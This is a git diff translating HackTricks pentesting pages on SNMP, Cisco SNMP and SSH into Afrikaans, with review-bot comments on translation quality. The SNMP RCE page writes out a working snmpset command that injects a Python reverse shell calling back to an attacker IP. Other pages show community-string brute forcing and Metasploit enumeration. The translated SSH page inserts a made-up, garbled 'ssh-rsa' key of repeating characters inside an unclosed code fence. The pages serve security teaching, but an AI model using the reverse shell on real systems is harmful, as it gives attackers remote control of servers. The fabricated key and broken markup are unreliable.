-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PRs in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
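Review bot: the "HackTricks Outomatiese Opdragte" block at the end of this hunk loses its structure: the removed lines under `Entry_1:` ... `Entry_5:` were indented (`- Name: Notes`, `- Description: Notes for SNMP`, `- Note: |`), but the added lines `+Name: Notes`, `+Description: Notes for SNMP`, `+Note: |` are flush left, so the keys are no longer nested under their `Entry_N:` parent and the `Note: |` block scalar has no indented body. That block is a machine-readable command manifest, not prose, and should be left byte-identical to the original rather than re-flowed by the translation. The same whitespace stripping removes the blank lines that separated prose from the ```bash fences (for example before `grep ".1.3.6.1.2.1.1.1.0" *.snmp` and before `braa ignite123@192.168.1.125:.1.3.6.*`); keeping those blank lines avoids rendering differences between the translated and the original page. Minor: the `## Spoofing` heading is left in English while every sibling heading is translated, and the MIB bullet list renders the OID lines fine but "Toegang tot `1.3.6.1.2.1.25.1.6.0`, hierdie parameter ..." is a sentence fragment; "Deur `1.3.6.1.2.1.25.1.6.0` te lees, kan ..." reads as a complete sentence.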
diff --git a/network-services-pentesting/pentesting-snmp/cisco-snmp.md b/network-services-pentesting/pentesting-snmp/cisco-snmp.md index ce164aca0..5023a3423 100644 --- a/network-services-pentesting/pentesting-snmp/cisco-snmp.md +++ b/network-services-pentesting/pentesting-snmp/cisco-snmp.md @@ -2,59 +2,55 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks-repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud-repo](https://github.com/carlospolop/hacktricks-cloud)**.
-# Pentesting Cisco Networks +# Pentesting Cisco-netwerke -**SNMP** functions over UDP with ports 161/UDP for general messages and 162/UDP for trap messages. This protocol relies on community strings, serving as passwords that enable communication between SNMP agents and servers. These strings are pivotal for they determine access levels, specifically **read-only (RO) or read-write (RW) permissions**. A notable attack vector for pentesters is the **brute-forcing of community strings**, aiming to infiltrate network devices. - -A practical tool for executing such brute-force attacks is **[onesixtyone](https://github.com/trailofbits/onesixtyone)**, which necessitates a list of potential community strings and the IP addresses of the targets: +**SNMP** funksioneer oor UDP met poorte 161/UDP vir algemene boodskappe en 162/UDP vir valboodskappe. Hierdie protokol steun op gemeenskapsreekse, wat as wagwoorde dien wat kommunikasie tussen SNMP-agente en bedieners moontlik maak. Hierdie reekse is van kardinale belang omdat hulle toegangsvlakke bepaal, spesifiek **slegs-lees (RO) of lees-skryf (RW) toestemmings**. 'n Noemenswaardige aanvalsvektor vir pentesters is die **brute-krag-aanval op gemeenskapsreekse**, met die doel om netwerktoestelle binne te dring. +'n Praktiese instrument vir die uitvoering van sulke brute-krag-aanvalle is **[onesixtyone](https://github.com/trailofbits/onesixtyone)**, wat 'n lys potensiële gemeenskapsreekse en die IP-adresse van die teikens vereis: ```bash onesixtyone -c communitystrings -i targets ``` - ### `cisco_config_tftp` -The Metasploit framework features the `cisco_config_tftp` module, facilitating the extraction of device configurations, contingent upon acquiring an RW community string. Essential parameters for this operation include: +Die Metasploit-raamwerk bevat die `cisco_config_tftp`-module wat die onttrekking van toestelkonfigurasies fasiliteer, afhangende van die verkryging van 'n RW-gemeenskapsnaam. 
Die noodsaaklike parameters vir hierdie operasie sluit in: -- RW community string (**COMMUNITY**) -- Attacker's IP (**LHOST**) -- Target device's IP (**RHOSTS**) -- Destination path for the configuration files (**OUTPUTDIR**) +- RW-gemeenskapsnaam (**COMMUNITY**) +- Aanvaller se IP (**LHOST**) +- Teiken toestel se IP (**RHOSTS**) +- Bestemmingspad vir die konfigurasie lêers (**OUTPUTDIR**) -Upon configuration, this module enables the download of device settings directly to a specified folder. +Na konfigurasie maak hierdie module die aflaai van toestelinstellings direk na 'n gespesifiseerde vouer moontlik. ### `snmp_enum` -Another Metasploit module, **`snmp_enum`**, specializes in gathering detailed hardware information. It operates with either type of community string and requires the target's IP address for successful execution: - +'n Ander Metasploit-module, **`snmp_enum`**, spesialiseer in die versameling van gedetailleerde hardeware-inligting. Dit werk met enige tipe gemeenskapsnaam en vereis die teiken se IP-adres vir suksesvolle uitvoering: ```bash msf6 auxiliary(scanner/snmp/snmp_enum) > set COMMUNITY public msf6 auxiliary(scanner/snmp/snmp_enum) > set RHOSTS 10.10.100.10 msf6 auxiliary(scanner/snmp/snmp_enum) > exploit ``` - -## References +## Verwysings * [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
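Review bot: terminology is inconsistent within this file and against the parent page. "Community string" is rendered "gemeenskapsreekse" in the opening paragraph ("Hierdie protokol steun op gemeenskapsreekse", "brute-krag-aanval op gemeenskapsreekse") but "gemeenskapsnaam" in the `cisco_config_tftp` parameter list ("RW-gemeenskapsnaam (**COMMUNITY**)") and in pentesting-snmp/README.md ("Beide opdragte vereis 'n **gemeenskapsnaam**"). Pick one term for all SNMP pages, and because the Metasploit option is literally `COMMUNITY`, keep the English "community string" in parentheses on first use so readers can map the prose to the tool parameters. Likewise "trap messages" becomes "valboodskappe" here while the parent page keeps "SNMP Trap-data"; "trap" is a protocol term (port 162/UDP) and should stay untranslated. Whitespace: the blank lines before `### `cisco_config_tftp`` and around the ```bash fences (`onesixtyone -c communitystrings -i targets`, the `msf6 auxiliary(scanner/snmp/snmp_enum)` session) are dropped; the command blocks themselves are unchanged, which is correct.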
diff --git a/network-services-pentesting/pentesting-snmp/snmp-rce.md b/network-services-pentesting/pentesting-snmp/snmp-rce.md index ff43b3eab..924bab741 100644 --- a/network-services-pentesting/pentesting-snmp/snmp-rce.md +++ b/network-services-pentesting/pentesting-snmp/snmp-rce.md @@ -1,83 +1,72 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
# SNMP RCE -SNMP can be exploited by an attacker if the administrator overlooks its default configuration on the device or server. By **abusing SNMP community with write permissions (rwcommunity)** on a Linux operating system, the attacker can execute commands on the server. +SNMP kan deur 'n aanvaller uitgebuit word as die administrateur sy verstekkonfigurasie op die toestel of bediener oorsien. Deur **SNMP-gemeenskap met skryfregte (rwcommunity)** op 'n Linux-bedryfstelsel te **misbruik**, kan die aanvaller opdragte op die bediener uitvoer. -## Extending Services with Additional Commands - -To extend SNMP services and add extra commands, it is possible to append new **rows to the "nsExtendObjects" table**. This can be achieved by using the `snmpset` command and providing the necessary parameters, including the absolute path to the executable and the command to be executed: +## Uitbreiding van Dienste met Ekstra Opdragte +Om SNMP-dienste uit te brei en ekstra opdragte by te voeg, is dit moontlik om nuwe **rye by die "nsExtendObjects" tabel** te voeg. Dit kan bereik word deur die `snmpset`-opdrag te gebruik en die nodige parameters te voorsien, insluitend die absolute pad na die uitvoerbare lêer en die opdrag wat uitgevoer moet word: ```bash snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c c0nfig localhost \ 'nsExtendStatus."evilcommand"' = createAndGo \ 'nsExtendCommand."evilcommand"' = /bin/echo \ 'nsExtendArgs."evilcommand"' = 'hello world' ``` +## Inspruiting Opdragte vir Uitvoering -## Injecting Commands for Execution +Inspruiting van opdragte vir uitvoering op die SNMP-diens vereis die bestaan en uitvoerbaarheid van die opgeroepde binêre / skripsie. Die **`NET-SNMP-EXTEND-MIB`** vereis die verskaffing van die absolute pad na die uitvoerbare lêer. -Injecting commands to run on the SNMP service requires the existence and executability of the called binary/script. The **`NET-SNMP-EXTEND-MIB`** mandates providing the absolute path to the executable. 
- -To confirm the execution of the injected command, the `snmpwalk` command can be used to enumerate the SNMP service. The **output will display the command and its associated details**, including the absolute path: +Om die uitvoering van die ingespruite opdrag te bevestig, kan die `snmpwalk`-opdrag gebruik word om die SNMP-diens op te som. Die **uitset sal die opdrag en die verbandhoudende besonderhede** insluit, insluitend die absolute pad: ```bash snmpwalk -v2c -c SuP3RPrivCom90 10.129.2.26 NET-SNMP-EXTEND-MIB::nsExtendObjects ``` +## Uitvoering van die Geïnjecteerde Opdragte -## Running the Injected Commands +Wanneer die **geïnjecteerde opdrag gelees word, word dit uitgevoer**. Hierdie gedrag staan bekend as **`run-on-read()`**. Die uitvoering van die opdrag kan waargeneem word tydens die snmpwalk lees. -When the **injected command is read, it is executed**. This behavior is known as **`run-on-read()`** The execution of the command can be observed during the snmpwalk read. +### Verkryging van Bediener Skulp met SNMP -### Gaining Server Shell with SNMP - -To gain control over the server and obtain a server shell, a python script developed by mxrch can be utilized from [**https://github.com/mxrch/snmp-shell.git**](https://github.com/mxrch/snmp-shell.git). - -Alternatively, a reverse shell can be manually created by injecting a specific command into SNMP. This command, triggered by the snmpwalk, establishes a reverse shell connection to the attacker's machine, enabling control over the victim machine. -You can install the pre-requisite to run this: +Om beheer oor die bediener te verkry en 'n bediener skulp te verkry, kan 'n Python-skrips ontwikkel deur mxrch gebruik word vanaf [**https://github.com/mxrch/snmp-shell.git**](https://github.com/mxrch/snmp-shell.git). +Alternatiewelik kan 'n omgekeerde skulp handmatig geskep word deur 'n spesifieke opdrag in SNMP in te spuit. 
Hierdie opdrag, geaktiveer deur die snmpwalk, vestig 'n omgekeerde skulpverbinding met die aanvaller se masjien, wat beheer oor die slagoffer masjien moontlik maak. +Jy kan die voorvereiste installeer om dit uit te voer: ```bash sudo apt install snmp snmp-mibs-downloader rlwrap -y git clone https://github.com/mxrch/snmp-shell cd snmp-shell sudo python3 -m pip install -r requirements.txt ``` - -Or a reverse shell: - +Of 'n omgekeerde dop: ```bash snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c SuP3RPrivCom90 10.129.2.26 'nsExtendStatus."command10"' = createAndGo 'nsExtendCommand."command10"' = /usr/bin/python3.6 'nsExtendArgs."command10"' = '-c "import sys,socket,os,pty;s=socket.socket();s.connect((\"10.10.14.84\",8999));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/sh\")"' ``` - -## References +## Verwysings * [https://rioasmara.com/2021/02/05/snmp-arbitary-command-execution-and-shell/](https://rioasmara.com/2021/02/05/snmp-arbitary-command-execution-and-shell/)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
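Review bot: the spelling "Inspruiting" in the heading `## Inspruiting Opdragte vir Uitvoering` and in "Inspruiting van opdragte vir uitvoering" is wrong (the Afrikaans is "inspuiting"), and the same concept is then rendered three different ways in this hunk: "ingespruite opdrag", `## Uitvoering van die Geïnjecteerde Opdragte`, and "in SNMP in te spuit". Use one form (for example "ingespuite opdrag" / "inspuiting") throughout. "Shell" is likewise translated as "skulp" in `### Verkryging van Bediener Skulp` and "omgekeerde skulp", but as "dop" in "Of 'n omgekeerde dop:"; settle on one term, or keep "shell" untranslated as the page already does in the title "# SNMP RCE" and in the tool name snmp-shell. The code blocks (the `snmpset -m +NET-SNMP-EXTEND-MIB ... createAndGo` example, the `snmpwalk ... NET-SNMP-EXTEND-MIB::nsExtendObjects` check, and the install commands) are carried over unchanged, which is right: the community strings and IPs in them are the original's example values and must not be localized. The blank lines at the top of the hunk (the removed `- ` and `-` lines before the header) and before `## Verwysings` are dropped, which is the same whitespace churn as in the other files of this patch.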
- - diff --git a/network-services-pentesting/pentesting-ssh.md b/network-services-pentesting/pentesting-ssh.md index ce0cc27af..167ac200a 100644 --- a/network-services-pentesting/pentesting-ssh.md +++ b/network-services-pentesting/pentesting-ssh.md @@ -2,237 +2,221 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hack-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). +As jy belangstel in 'n **hackingsloopbaan** en die onhackbare wil hack - **ons is aan die werf!** (_vloeiende skriftelike en mondelinge Pools vereis_). {% embed url="https://www.stmcyber.com/careers" %} -## Basic Information +## Basiese Inligting -**SSH (Secure Shell or Secure Socket Shell)** is a network protocol that enables a secure connection to a computer over an unsecured network. It is essential for maintaining the confidentiality and integrity of data when accessing remote systems. - -**Default port:** 22 +**SSH (Secure Shell of Secure Socket Shell)** is 'n netwerkprotokol wat 'n veilige verbinding met 'n rekenaar oor 'n onveilige netwerk moontlik maak. Dit is noodsaaklik vir die handhawing van die vertroulikheid en integriteit van data wanneer daar toegang tot afgeleë stelsels verkry word. +**Verstekpoort:** 22 ``` 22/tcp open ssh syn-ack ``` +**SSH-bediener:** -**SSH servers:** +* [openSSH](http://www.openssh.org) - OpenBSD SSH, verskep in BSD, Linux-distribusies en Windows sedert Windows 10 +* [Dropbear](https://matt.ucc.asn.au/dropbear/dropbear.html) - SSH-implementering vir omgewings met lae geheue- en verwerkerhulpbronne, verskep in OpenWrt +* [PuTTY](https://www.chiark.greenend.org.uk/\~sgtatham/putty/) - SSH-implementering vir Windows, die kliënt word algemeen gebruik, maar die gebruik van die bediener is seldsaam +* [CopSSH](https://www.itefix.net/copssh) - implementering van OpenSSH vir Windows -* [openSSH](http://www.openssh.org) – OpenBSD SSH, shipped in BSD, Linux distributions and Windows since Windows 10 -* [Dropbear](https://matt.ucc.asn.au/dropbear/dropbear.html) – SSH implementation for environments with low memory and processor resources, shipped in OpenWrt -* [PuTTY](https://www.chiark.greenend.org.uk/\~sgtatham/putty/) – SSH implementation for Windows, the client is commonly used but the use of the 
server is rarer -* [CopSSH](https://www.itefix.net/copssh) – implementation of OpenSSH for Windows +**SSH-biblioteke (implementering van bedienerkant):** -**SSH libraries (implementing server-side):** +* [libssh](https://www.libssh.org) - multiplatform C-biblioteek wat die SSHv2-protokol implementeer met bindings in [Python](https://github.com/ParallelSSH/ssh-python), [Perl](https://github.com/garnier-quentin/perl-libssh/) en [R](https://github.com/ropensci/ssh); dit word deur KDE gebruik vir sftp en deur GitHub vir die git SSH-infrastruktuur +* [wolfSSH](https://www.wolfssl.com/products/wolfssh/) - SSHv2-bedienerbiblioteek geskryf in ANSI C en gemik op ingebedde, RTOS- en hulpbronbeperkte omgewings +* [Apache MINA SSHD](https://mina.apache.org/sshd-project/index.html) - Apache SSHD Java-biblioteek is gebaseer op Apache MINA +* [paramiko](https://github.com/paramiko/paramiko) - Python SSHv2-protokolbiblioteek -* [libssh](https://www.libssh.org) – multiplatform C library implementing the SSHv2 protocol with bindings in [Python](https://github.com/ParallelSSH/ssh-python), [Perl](https://github.com/garnier-quentin/perl-libssh/) and [R](https://github.com/ropensci/ssh); it’s used by KDE for sftp and by GitHub for the git SSH infrastructure -* [wolfSSH](https://www.wolfssl.com/products/wolfssh/) – SSHv2 server library written in ANSI C and targeted for embedded, RTOS, and resource-constrained environments -* [Apache MINA SSHD](https://mina.apache.org/sshd-project/index.html) – Apache SSHD java library is based on Apache MINA -* [paramiko](https://github.com/paramiko/paramiko) – Python SSHv2 protocol library - -## Enumeration +## Opname ### Banner Grabbing - ```bash nc -vn 22 ``` +### Outomatiese ssh-audit -### Automated ssh-audit +ssh-audit is 'n instrument vir die ouditering van ssh-bediener- en kliëntkonfigurasie. -ssh-audit is a tool for ssh server & client configuration auditing. 
+[https://github.com/jtesta/ssh-audit](https://github.com/jtesta/ssh-audit) is 'n opgedateerde vurk van [https://github.com/arthepsy/ssh-audit/](https://github.com/arthepsy/ssh-audit/) -[https://github.com/jtesta/ssh-audit](https://github.com/jtesta/ssh-audit) is an updated fork from [https://github.com/arthepsy/ssh-audit/](https://github.com/arthepsy/ssh-audit/) - -**Features:** - -* SSH1 and SSH2 protocol server support; -* analyze SSH client configuration; -* grab banner, recognize device or software and operating system, detect compression; -* gather key-exchange, host-key, encryption and message authentication code algorithms; -* output algorithm information (available since, removed/disabled, unsafe/weak/legacy, etc); -* output algorithm recommendations (append or remove based on recognized software version); -* output security information (related issues, assigned CVE list, etc); -* analyze SSH version compatibility based on algorithm information; -* historical information from OpenSSH, Dropbear SSH and libssh; -* runs on Linux and Windows; -* no dependencies +**Kenmerke:** +* Ondersteuning vir SSH1- en SSH2-protokolbedieners; +* analiseer SSH-kliëntkonfigurasie; +* gryp banier, herken toestel of sagteware en bedryfstelsel, ontdek kompressie; +* versamel sleuteluitruil, gasheksleutel, enkripsie en boodskapverifikasiekode-algoritmes; +* uitvoer algoritme-inligting (beskikbaar sedert, verwyder/gedeaktiveer, onveilig/swak/oud, ens.); +* uitvoer algoritme-aanbevelings (voeg by of verwyder gebaseer op herkenning van sagteware-weergawe); +* uitvoer van veiligheidsinligting (verwante kwessies, toegewysde CVE-lys, ens.); +* analiseer SSH-weergawe-verenigbaarheid gebaseer op algoritme-inligting; +* historiese inligting van OpenSSH, Dropbear SSH en libssh; +* werk op Linux en Windows; +* geen afhanklikhede. 
```bash usage: ssh-audit.py [-1246pbcnjvlt] - -1, --ssh1 force ssh version 1 only - -2, --ssh2 force ssh version 2 only - -4, --ipv4 enable IPv4 (order of precedence) - -6, --ipv6 enable IPv6 (order of precedence) - -p, --port= port to connect - -b, --batch batch output - -c, --client-audit starts a server on port 2222 to audit client - software config (use -p to change port; - use -t to change timeout) - -n, --no-colors disable colors - -j, --json JSON output - -v, --verbose verbose output - -l, --level= minimum output level (info|warn|fail) - -t, --timeout= timeout (in seconds) for connection and reading - (default: 5) +-1, --ssh1 force ssh version 1 only +-2, --ssh2 force ssh version 2 only +-4, --ipv4 enable IPv4 (order of precedence) +-6, --ipv6 enable IPv6 (order of precedence) +-p, --port= port to connect +-b, --batch batch output +-c, --client-audit starts a server on port 2222 to audit client +software config (use -p to change port; +use -t to change timeout) +-n, --no-colors disable colors +-j, --json JSON output +-v, --verbose verbose output +-l, --level= minimum output level (info|warn|fail) +-t, --timeout= timeout (in seconds) for connection and reading +(default: 5) $ python3 ssh-audit ``` +### Openbare SSH-sleutel van bediener -[See it in action (Asciinema)](https://asciinema.org/a/96ejZKxpbuupTK9j7h8BdClzp) - -### Public SSH key of server - +```plaintext +ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDZz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz ```bash ssh-keyscan -t rsa -p ``` +### Swakker Sifer Algoritmes -### Weak Cipher Algorithms - -This is discovered by default by **nmap**. But you can also use **sslcan** or **sslyze**. - -### Nmap scripts +Dit word standaard ontdek deur **nmap**. 
